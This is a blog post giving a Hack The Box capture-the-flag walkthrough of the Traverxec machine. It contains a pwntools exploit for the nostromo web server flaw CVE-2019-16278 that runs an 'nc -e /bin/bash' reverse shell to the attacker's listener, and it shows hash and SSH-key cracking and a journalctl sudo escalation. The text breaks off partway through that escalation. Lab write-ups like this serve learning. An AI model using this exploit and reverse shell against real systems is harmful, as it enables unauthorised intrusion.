Hello i am arsalan. information system student, i blog about cyber security, ctf writeup , web development , and more about tech. born and raised in indonesia , currently living in indonesia

Posts   About

CVE-2019-16278 Hackthebox Traverxec Writeup

this article explains about ctf writeup.


hello this is my writeup for Traverxec from hackthebox, an awesome platform to learn hacking


for the first time, we have to gathering more information about this machine so i use nmap to see what ports is open and what services they are.

this machine running http (80) and ssh (22) ,so that i open the web page on my browser and this is the web page

it looks like a normal static website, so i try to accessing /admin and this is what i got

as you can see , this website is using nostromo web server , so i check about this webserver and searching for the bug and i got this CVE here so i create a python script to exploit the web server , this is my exploit :

from pwn import *

cmd = "nc -e /bin/bash 1337"
payload="""POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1""".format(cmd)

r = remote("",80)

before running the script i listening to port 1337 from my machine

and run the exploit

after running the exploit , check the listening terminal again , and we got our shell

now lets see nostromo web server directory on /var/nostromo , and i found several directory


the most interesting thing is conf folder , so i check conf directory and found two file


nhttpd? hmm okay it looks interesting , so let’s open it


servername		traverxec.htb
serverlisten		*
serveradmin		david@traverxec.htb
serverroot		/var/nostromo
servermimes		conf/mimes
docroot			/var/nostromo/htdocs
docindex		index.html


logpid			logs/nhttpd.pid


user			www-data


htaccess		.htaccess
htpasswd		/var/nostromo/conf/.htpasswd


/icons			/var/nostromo/icons


homedirs		/home
homedirs_public		public_www

Cracking htpasswd

there is htpasswd inside /var/nostromo/conf/ and some HOMEDIRS configuration , let’s see what inside htpasswd


the password is encrypted , so i check the hash using hashid

well okay , let’s use hashcat to crack it , after reading the example hash from hashcat documentation here i got information about the hash-mode , it’s 500 so let’s crack it using rockyou wordlist you can download the wordlist here

okay good , we got the password. but this is not the ssh password , after enumerating and reading the manual here i got something inside homedirs

To serve the home directories of your users via HTTP, enable the homedirs option by
defining the path in where the home directories are stored, normally /home. To access
a users home directory enter a ~ in the URL followed by the home directory name like
in this example:


well , let’s try to open on the machine.

another web page ? okay. after enumerating more, i end up trying to accessing /home/david via CVE-2019-16278 and i got nothing but , i remember about our homedirs, there is a configuration like this :

homedirs		/home
homedirs_public		public_www

so i asume public_www must be exist inside /home/david/ so when i try to access via /home/david/public_www i got something:

a directory called protected-file-area, and it’s contain a file


okay let’s download the file via browser by accessing the link

and i got a prompt like this

so let’s use david as our username and Nowonly4me as our password and we are in

Crack Rsa Private Key

after download the file, i got .ssh directory and some files


from now we got a private key right ? so let’s crack the private key to get the passphrase, i use ssh2john and pipe it to a file, you can download ssh2john here and now let’s crack it

nice, we got the passphrase, now lets try to login via ssh as david

Rooting Machine

after login i found something inside /home/david/bin


and this is server-stats.sh


cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

and this is what i got, if i run the script

it looks like journalctl running as root, so it possible to us to escalate via journalctl.

Privilege Escalation

after reading on here i found that journalctl is using less as default pager, so if the size of our terminal is too small to load the output it will pipe to less. firstly i copied last line of server-stats.sh and remove pipe , like this

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

and run it.